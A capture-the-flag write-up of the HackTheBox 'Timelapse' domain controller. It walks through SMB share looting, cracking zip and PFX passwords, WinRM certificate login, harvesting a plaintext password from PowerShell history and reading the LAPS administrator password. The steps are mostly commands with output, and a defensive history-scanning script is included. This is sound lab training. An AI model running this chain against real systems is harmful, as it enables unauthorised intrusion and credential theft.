Machine Overview
Timelapse is an easy-rated Windows Active Directory Domain Controller from HackTheBox. The machine focuses on SMB enumeration, certificate-based authentication via WinRM, and privilege escalation through LAPS (Local Administrator Password Solution). Initial access is gained by discovering a PFX certificate file in an exposed SMB share, cracking its password, and using it to authenticate via WinRM. Credentials are then discovered in PowerShell history files, leading to access as a service account with LAPS read permissions. Privilege escalation is achieved by reading the LAPS-managed local administrator password from Active Directory.
Enumeration
Network Scanning
We start by performing an Nmap scan to identify open ports and services:
nmap -A -p- -oN nmap.txt 10.10.11.152
Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-07 16:27:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-12-07T16:28:39+00:00; +8h00m22s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
Looking at the open ports (DNS, Kerberos, LDAP, SMB, and the global catalog on 3268/3269), we can see that the machine is an AD Domain Controller. We next enumerate SMB shares with a guest session:
$ netexec smb 10.10.11.152 -u guest -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\guest:
SMB 10.10.11.152 445 DC01 [*] Enumerated shares
SMB 10.10.11.152 445 DC01 Share Permissions Remark
SMB 10.10.11.152 445 DC01 ----- ----------- ------
SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.152 445 DC01 C$ Default share
SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.152 445 DC01 NETLOGON Logon server share
SMB 10.10.11.152 445 DC01 Shares READ
SMB 10.10.11.152 445 DC01 SYSVOL Logon server share
The Shares share is readable with guest authentication, so let's explore it:
$ smbclient -N //10.10.11.152/Shares
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd "Shares"
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (28.3 KiloBytes/sec) (average 28.3 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (3269.5 KiloBytes/sec) (average 2581.5 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (962.0 KiloBytes/sec) (average 2257.6 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (3964.2 KiloBytes/sec) (average 2649.5 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (755.1 KiloBytes/sec) (average 2421.8 KiloBytes/sec)
We successfully downloaded several files. The most interesting file is winrm_backup.zip in the Dev directory.
Extracting and Cracking the ZIP Archive
The winrm_backup.zip file is password-protected. We use zip2john to extract the hash and crack it with John the Ripper:
zip2john winrm_backup.zip > hash
john --wordlist=`fzf-wordlists` hash
Cracked Password:
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
We extract the ZIP file using the password supremelegacy:
unzip winrm_backup.zip
This reveals a PFX certificate file: legacyy_dev_auth.pfx
What is a PFX file?
A PFX file (Personal Information Exchange, the PKCS#12 container format) bundles a certificate, its private key, and optionally the issuing chain into a single password-protected file. It is commonly used to distribute client-authentication certificates, which is exactly why finding one in a world-readable share is a problem: whoever can open it can authenticate as its subject.
Cracking the PFX Certificate Password
The PFX file itself is password-protected. We extract its hash and crack it:
pfx2john.py legacyy_dev_auth.pfx > pfx-hash
john --wordlist=`fzf-wordlists` pfx-hash
Cracked Password:
thuglegacy (legacyy_dev_auth.pfx)
Extracting Certificate and Private Key
We extract the private key and certificate from the PFX file using OpenSSL:
# Extract encrypted private key
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
# Decrypt the private key
openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
# Extract the certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
We now have the private key (legacyy_dev_auth.key) and certificate (legacyy_dev_auth.crt) needed for certificate-based authentication.
Initial Access
Certificate-Based Authentication
We use the extracted certificate and private key to authenticate via WinRM:
$ evil-winrm -i 10.10.11.152 -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
Evil-WinRM shell v3.7
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
We have successfully authenticated as the legacyy user using certificate-based authentication.
User flag
C:\Users\legacyy\Desktop\user.txt
Discovering Credentials in PowerShell History
The PSReadLine module keeps a per-user record of interactive PowerShell commands in ConsoleHost_history.txt; anything typed at the prompt, including inline passwords, is saved there in clear text. We check this file for any exposed credentials:
cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\
type ConsoleHost_history.txt
PowerShell History Contents:
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
The PowerShell history reveals credentials for the svc_deploy user: E3R$Q62^12p7PLlC%KWaxuaV
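As a defender-side complement to the finding above, the following Python script (an added example, not part of the original writeup) scans a ConsoleHost_history.txt for literal secrets: it flags ConvertTo-SecureString ... -AsPlainText, net user <name> <password>, and explicit -p/-Password arguments, ties a secure-string variable to the account later bound to it through PSCredential, skips variable references that are not literals, and reports each hit with the secret masked. The sample history is constructed and uses placeholder passwords; Invoke-Sqlcmd appears only as an illustrative cmdlet that takes -Username and -Password.

```python
import re
from typing import List, NamedTuple

# Finding: history line number, matching rule, account (if known) and the line with the secret masked.
Finding = NamedTuple("Finding", [("line_no", int), ("rule", str), ("account", str), ("redacted", str)])

# Patterns for literal secrets; group 'secret' is masked, optional group 'acct' names the account.
RULES = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q)\s+-AsPlainText", re.I)),
    ("net user <name> <password>",
     re.compile(r"\bnet\s+user\s+(?P<acct>\S+)\s+(?P<q>['\"]?)(?P<secret>[^'\"\s/][^'\"\s]*)(?P=q)", re.I)),
    ("explicit -p/-pass/-Password argument",
     re.compile(r"(?:^|\s)-{1,2}p(?:ass(?:word)?)?\s+(?P<q>['\"]?)(?P<secret>[^'\"\s]+)(?P=q)", re.I)),
]
ASSIGN = re.compile(r"^\s*(?P<var>\$\w+)\s*=\s*ConvertTo-SecureString", re.I)
CRED = re.compile(r"PSCredential\s*\(\s*['\"](?P<acct>[^'\"]+)['\"]\s*,\s*(?P<var>\$\w+)", re.I)
USER = re.compile(r"(?:^|\s)-{1,2}u(?:ser(?:name)?)?\s+(?P<acct>\S+)", re.I)

def scan_history(text: str) -> List[Finding]:
    """Return one Finding per history line that embeds a literal secret."""
    lines = text.splitlines()
    # A secure-string variable later wrapped in a PSCredential tells us which account the secret is for.
    var_to_acct = {m.group("var").lower(): m.group("acct") for m in map(CRED.search, lines) if m}
    findings: List[Finding] = []
    for no, line in enumerate(lines, 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if not m or m.group("secret").startswith("$"):  # a variable reference is not a literal
                continue
            acct = m.groupdict().get("acct") or ""
            if not acct and (a := ASSIGN.match(line)):
                acct = var_to_acct.get(a.group("var").lower(), "")
            if not acct and (u := USER.search(line)):
                acct = u.group("acct")
            masked = line[:m.start("secret")] + "***" + line[m.end("secret"):]
            findings.append(Finding(no, rule, acct, masked))
    return findings

# Constructed sample modelled on the history in this walkthrough; all passwords are placeholders.
SAMPLE_HISTORY = """$p = ConvertTo-SecureString 'PLACEHOLDER-PASSWORD-1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
Invoke-Sqlcmd -ServerInstance db01 -Username sa -Password 'PLACEHOLDER-PASSWORD-2'
net user backupadmin "PLACEHOLDER-PASSWORD-3" /add
Invoke-Sqlcmd -ServerInstance db02 -Username sa -Password $securePw
get-aduser -filter * -properties *
"""
if __name__ == "__main__":
    print(*scan_history(SAMPLE_HISTORY), sep="\n")
```

Run it against each user's PSReadLine history on a host (or ship the findings to your SIEM) to catch credentials left behind by administrators, which is the same weakness exploited in this box.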
We authenticate using these credentials and SSL:
$ evil-winrm -i 10.10.11.152 -S -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.7
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Privilege Escalation
Enumerating User Privileges
We check the current user's group memberships and privileges:
$ whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
<...SNIP...>
The user svc_deploy is a member of the LAPS_Readers group.
What is LAPS?
LAPS (Local Administrator Password Solution) is a Microsoft feature that manages the local administrator account password on domain-joined computers: it sets a random password on each machine and stores it in Active Directory in the ms-Mcs-AdmPwd attribute of the computer object. Any principal delegated read access to that attribute, in this domain the LAPS_Readers group, can retrieve the current local administrator password for a given computer, so membership in such a group is effectively local admin on every machine in scope.
Reading the LAPS Password
Since svc_deploy is a member of LAPS_Readers, we can query Active Directory to retrieve the LAPS-managed local administrator password for the DC01 computer:
$ Get-ADComputer DC01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : &50jbBJ+N&RC(04r8}79I7,A ##
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
We successfully retrieved the local administrator password: &50jbBJ+N&RC(04r8}79I7,A
Administrator Access
We use the LAPS password to authenticate as the Administrator:
$ evil-winrm -i 10.10.11.152 -S -u 'administrator' -p '&50jbBJ+N&RC(04r8}79I7,A'
Evil-WinRM shell v3.7
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We now have a shell running as the Administrator user.
Root flag
The root flag is located at C:\Users\TRX\Desktop\root.txt (not in the Administrator's desktop).

